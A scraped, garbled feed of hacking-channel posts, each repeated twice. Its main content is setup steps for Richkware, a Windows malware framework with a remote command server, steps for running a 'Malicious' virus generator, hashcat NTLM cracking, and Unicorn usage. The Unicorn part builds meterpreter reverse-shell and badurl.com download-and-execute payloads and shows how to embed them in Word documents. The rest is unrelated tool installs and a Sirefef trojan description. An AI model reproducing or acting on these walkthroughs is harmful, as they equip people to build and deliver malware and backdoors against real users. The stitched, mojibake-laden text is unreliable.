If you have deployed RMS, you can initialize the malware as follows:
int main() {
Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
...
return 0;
}
5) Otherwise, if you haven't deployed RMS, you can use:
Richkware richkware("Richk","richktest");
in this way, it uses "richktest" as encryption key.
> ( Using MinGW for Windows or MinGW cross compiler for Linux build environment
make)
6) Compiling :
Using Microsoft C++ compiler (Visual Studio)
> C/C++ > Preprocessor > Preprocessor Definitions, add
> "_CRT_SECURE_NO_WARNINGS"
Linker > Input > Additional Dependencies, add "Ws2_32.lib"
7) Remotely Command Execution
Call framework function StartServer in the main, it starts server on a port, in the following example is the TCP port 8000. Remember that if a port is already used by another program, you can't use that port, until the program will be stopped.
int main () {
...
richkware.network.server.Start("8000");
...
}
8)Connect using terminal in Unix systems
In Unix systems, you can use netcat, and run the following command:
nc <serverName> 8000
9) Connect using terminal in Windows
In Windows, you can use telnet, in the same way:
> telnet <serverName> 8000
๐ฆE N J O Y
WRITTEN BY Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Framework for building Windows malware written in C++ 2019 new release //
> Virus/ Worms /Bot / Spyware/ Keylogger/ Scareware
>Richkware is a library of network and OS functions, that you can use to create malware. The composition of these functions permits the application to assume behaviors referable to the following types of malware
t.me/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/richkmeli/Richkware
2) cd Richware
3) Open main.cpp, and create an instance of Richkware.
4) With Richkware-Manager-Server
If you have deployed RMS, you can initialize the malware as follows:
int main() {
Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
...
return 0;
}
5) Otherwise, if you haven't deployed RMS, you can use:
Richkware richkware("Richk","richktest");
in this way, it uses "richktest" as encryption key.
> ( Using MinGW for Windows or MinGW cross compiler for Linux build environment
make)
6) Compiling :
Using Microsoft C++ compiler (Visual Studio)
> C/C++ > Preprocessor > Preprocessor Definitions, add
> "_CRT_SECURE_NO_WARNINGS"
Linker > Input > Additional Dependencies, add "Ws2_32.lib"
7) Remotely Command Execution
Call framework function StartServer in the main, it starts server on a port, in the following example is the TCP port 8000. Remember that if a port is already used by another program, you can't use that port, until the program will be stopped.
int main () {
...
richkware.network.server.Start("8000");
...
}
8)Connect using terminal in Unix systems
In Unix systems, you can use netcat, and run the following command:
nc <serverName> 8000
9) Connect using terminal in Windows
In Windows, you can use telnet, in the same way:
> telnet <serverName> 8000
๐ฆE N J O Y
WRITTEN BY Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - richkmeli/Richkware: Framework for building Windows malware, written in C++
Framework for building Windows malware, written in C++ - richkmeli/Richkware
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Install ADB & FastBoot Tools in Termux!
2019
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
A) Silent installation:
1) Copy and paste the following command in Termux to silently install Tools:
> apt update > /dev/null 2>&1 && apt --assume-yes install wget > /dev/null
2) wget https://github.com/MasterDevX/Termux-ADB/raw/master/
3) InstallTools.sh -q && bash InstallTools.sh
B) Common installation:
1) Copy and paste the following command in Termux to install Tools with logs output:
> apt update && apt install wget && wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh && bash InstallTools.sh
๐ฆTested
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Install ADB & FastBoot Tools in Termux!
2019
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
A) Silent installation:
1) Copy and paste the following command in Termux to silently install Tools:
> apt update > /dev/null 2>&1 && apt --assume-yes install wget > /dev/null
2) wget https://github.com/MasterDevX/Termux-ADB/raw/master/
3) InstallTools.sh -q && bash InstallTools.sh
B) Common installation:
1) Copy and paste the following command in Termux to install Tools with logs output:
> apt update && apt install wget && wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh && bash InstallTools.sh
๐ฆTested
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow To Compress / Decompress Brawl Stars SC files on Windows / Linux / Android!
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
> On Windows:
1) Download Python 3.5 or newer version from official page.
>https://www.python.org/downloads/
2) Install Python. While Installing, enable such parameters as "Add Python to PATH", "Install pip", "Install py launcher", "Associate files with Python" and "Add Python to environment variables".
3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases
4) Execute "Init.py" file to install required modules and create workspace directories.
๐ฆOn Linux:
1) Open Terminal and install Python by executing following command:
2) sudo apt-get update && sudo apt-get install python3 python3-pip
3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases
4) Execute "Init.py" file to install required modules and create workspace directories.
๐ฆ On Android:
1) Download and install PyDroid app from Google Play.
> https://play.google.com/store/apps/details?id=ru.iiec.pydroid3
2) Open PyDroid and wait until Python installs.
3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases
4) In PyDroid open and execute "Init.py" file to install required modules and create workspace directories.
๐ฆ How to use
> To compile SC:
1) Put folders with texture name and .png files inside them in the "In-Decompressed-SC" directory and execute "SC-Encode.py" script. After the process will be finished, your .sc files will appear in "Out-Compressed-SC" folder.
2) To decompile SC:
> Put .sc files in the "In-Compressed-SC" directory and execute "SC-Decode.py" script. After the process will be finished, your .png files will appear in "Out-Decompressed-SC" folder.
๐ฆTested By undercOde
> win server essentiel
> android 8.0
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow To Compress / Decompress Brawl Stars SC files on Windows / Linux / Android!
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
> On Windows:
1) Download Python 3.5 or newer version from official page.
>https://www.python.org/downloads/
2) Install Python. While Installing, enable such parameters as "Add Python to PATH", "Install pip", "Install py launcher", "Associate files with Python" and "Add Python to environment variables".
3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases
4) Execute "Init.py" file to install required modules and create workspace directories.
๐ฆOn Linux:
1) Open Terminal and install Python by executing following command:
2) sudo apt-get update && sudo apt-get install python3 python3-pip
3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases
4) Execute "Init.py" file to install required modules and create workspace directories.
๐ฆ On Android:
1) Download and install PyDroid app from Google Play.
> https://play.google.com/store/apps/details?id=ru.iiec.pydroid3
2) Open PyDroid and wait until Python installs.
3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases
4) In PyDroid open and execute "Init.py" file to install required modules and create workspace directories.
๐ฆ How to use
> To compile SC:
1) Put folders with texture name and .png files inside them in the "In-Decompressed-SC" directory and execute "SC-Encode.py" script. After the process will be finished, your .sc files will appear in "Out-Compressed-SC" folder.
2) To decompile SC:
> Put .sc files in the "In-Compressed-SC" directory and execute "SC-Decode.py" script. After the process will be finished, your .png files will appear in "Out-Decompressed-SC" folder.
๐ฆTested By undercOde
> win server essentiel
> android 8.0
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ WIN32/SIREFEF VIRUS i just to test now this Virus & his effect on windows in UndercOde i declare:
t.me/UndercOdeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> This family of malware uses stealth to hide its presence on your PC. Trojans in this family can do different things, including:
1) Downloading and running other files
2) Contacting remote hosts
3) Disabling security features
4) Members of the family can also change search results, which can generate money for the hackers who use Sirefef.
> Variants of Win32/Sirefef might be installed by other malware, including variants of the Trojan:Win32/Necurs family.
5) This kind on Virus dangerous can t be removed easly
> in addiction anti-virus apps detect and remove whole file
can t be remove from those files by anti-virus apps
Written by Steaven
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ WIN32/SIREFEF VIRUS i just to test now this Virus & his effect on windows in UndercOde i declare:
t.me/UndercOdeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> This family of malware uses stealth to hide its presence on your PC. Trojans in this family can do different things, including:
1) Downloading and running other files
2) Contacting remote hosts
3) Disabling security features
4) Members of the family can also change search results, which can generate money for the hackers who use Sirefef.
> Variants of Win32/Sirefef might be installed by other malware, including variants of the Trojan:Win32/Necurs family.
5) This kind on Virus dangerous can t be removed easly
> in addiction anti-virus apps detect and remove whole file
can t be remove from those files by anti-virus apps
Written by Steaven
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow Create Virus on Termux/Linux Without root - simple example
instagram.com/UndercodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) apt update && apt upgrade
2) apt install git
3) apt install python && apt install python2
4) git clone https://github.com/TheReaper167/Malicious
5) cd Malicious
6) pip2 install -r requirements.txt
7) pip2 install requests
8) python2 malicious.py
9) after download virus open your file explorer
10) p find folder Malicious and open it
11) chose and open folder Android if you download virus Android
Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow Create Virus on Termux/Linux Without root - simple example
instagram.com/UndercodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) apt update && apt upgrade
2) apt install git
3) apt install python && apt install python2
4) git clone https://github.com/TheReaper167/Malicious
5) cd Malicious
6) pip2 install -r requirements.txt
7) pip2 install requests
8) python2 malicious.py
9) after download virus open your file explorer
10) p find folder Malicious and open it
11) chose and open folder Android if you download virus Android
Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆAutomate Cracking
For Linux & root termux
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) mkdir -p hashcat/deps
2) git clone https://github.com/KhronosGroup/OpenCL-Headers.git
3) hashcat/deps/OpenCL
4) cd hashcat/
5) make
6) make install
7) python wordlist_optimizer.py <input file list> <output directory>
8) python wordlist_optimizer.py wordlists.txt ../optimized_wordlists
9) hashcat --help |grep -i ntlm
5500 | NetNTLMv1 | Network protocols
5500 | NetNTLMv1 + ESS | Network protocols
5600 | NetNTLMv2 | Network protocols
1000 | NTLM | Operating-Systems
๐ฆFeatures :
(1) Quick Crack
(2) Extensive Pure_Hate Methodology Crack
(3) Brute Force Attack
(4) Top Mask Attack
(5) Fingerprint Attack
(6) Combinator Attack
(7) Hybrid Attack
(8) Pathwell Top 100 Mask Brute Force Crack
(9) PRINCE Attack
(10) YOLO Combinator Attack
(11) Middle Combinator Attack
(12) Thorough Combinator Attack
๐ฆTested by UndercOde On:
> Ubanto
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆAutomate Cracking
For Linux & root termux
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) mkdir -p hashcat/deps
2) git clone https://github.com/KhronosGroup/OpenCL-Headers.git
3) hashcat/deps/OpenCL
4) cd hashcat/
5) make
6) make install
7) python wordlist_optimizer.py <input file list> <output directory>
8) python wordlist_optimizer.py wordlists.txt ../optimized_wordlists
9) hashcat --help |grep -i ntlm
5500 | NetNTLMv1 | Network protocols
5500 | NetNTLMv1 + ESS | Network protocols
5600 | NetNTLMv2 | Network protocols
1000 | NTLM | Operating-Systems
๐ฆFeatures :
(1) Quick Crack
(2) Extensive Pure_Hate Methodology Crack
(3) Brute Force Attack
(4) Top Mask Attack
(5) Fingerprint Attack
(6) Combinator Attack
(7) Hybrid Attack
(8) Pathwell Top 100 Mask Brute Force Crack
(9) PRINCE Attack
(10) YOLO Combinator Attack
(11) Middle Combinator Attack
(12) Thorough Combinator Attack
๐ฆTested by UndercOde On:
> Ubanto
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ New release 2019 in tool for using a PowerShell downgrade attack and inject shellcode straight into memory
> you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack
> use for learning only
instagram.com/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/trustedsec/unicorn
2) cd unicorn
3) python unicorn.py
4) Commands :
> python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
> PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
> PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
> Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
> Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
> Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
> HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
> HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
> HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
> DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
>CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
>Custom PS1 Example: python unicorn.py <path to ps1 file>
> Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
> Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
>Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help
๐ฆ to apply the payload :
1) Open Word
2) Insert tab -> Quick Parts -> Field
3) Choose = (Formula) and click ok.
4) Once the field is inserted, you should now see "!Unexpected End of Formula"
5) Right-click the Field, choose "Toggle Field Codes"
6) Paste in the code from Unicorn
7) Save the Word document.
E N J O Y
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ New release 2019 in tool for using a PowerShell downgrade attack and inject shellcode straight into memory
> you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack
> use for learning only
instagram.com/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/trustedsec/unicorn
2) cd unicorn
3) python unicorn.py
4) Commands :
> python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
> PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
> PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
> Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
> Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
> Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
> HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
> HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
> HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
> DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
>CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
>Custom PS1 Example: python unicorn.py <path to ps1 file>
> Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
> Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
>Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help
๐ฆ to apply the payload :
1) Open Word
2) Insert tab -> Quick Parts -> Field
3) Choose = (Formula) and click ok.
4) Once the field is inserted, you should now see "!Unexpected End of Formula"
5) Right-click the Field, choose "Toggle Field Codes"
6) Paste in the code from Unicorn
7) Save the Word document.
E N J O Y
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ